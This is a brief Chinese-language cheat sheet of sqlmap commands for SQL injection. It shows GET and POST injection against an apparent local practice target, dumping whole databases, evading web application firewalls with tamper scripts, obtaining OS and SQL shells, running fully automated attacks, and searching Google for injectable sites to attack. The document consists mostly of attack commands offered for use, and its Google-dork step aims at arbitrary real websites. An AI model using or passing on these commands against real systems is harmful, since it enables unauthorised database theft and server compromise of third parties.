GET注入
python sqlmap.py -u "http://127.0.0.1/Less-1/?id=1" -p "id"
使用--dbs获得数据库列表,使用“-d 数据库名 --table”指定获得所有表名
使用“--dump”可以索取全部数据
POST注入
如果参数是位于post或者Header中某个字段中,可以通过“-u URL --data=POST data”来附加POST的Body,但是最好将HTTP请求数据包(抓包)放入一个文本中,如1.TXT,之后用-r来指定一个文本。
python sqlmap.py -r 1.txt
可以在1.txt文本中注入点位置添加*来告知sqlmap
-tamper
可以通过 “--risk” “--level”调整 扫描级别,服务器存在WAF或者其他拦截器时,可以使用"-tamper"来变形Payload
获取shell
使用 python sqlmap.py -r 1.txt --os -shell --level=3可以获取shell
自动注入
--batch --smart -a自动注入 ,--batch --smart 自动选择 y/s/q
获取数据库shell
--sql -shell
利用谷歌自动搜索可以被注入的网站
sqlmap -g "inurl:php?id=1"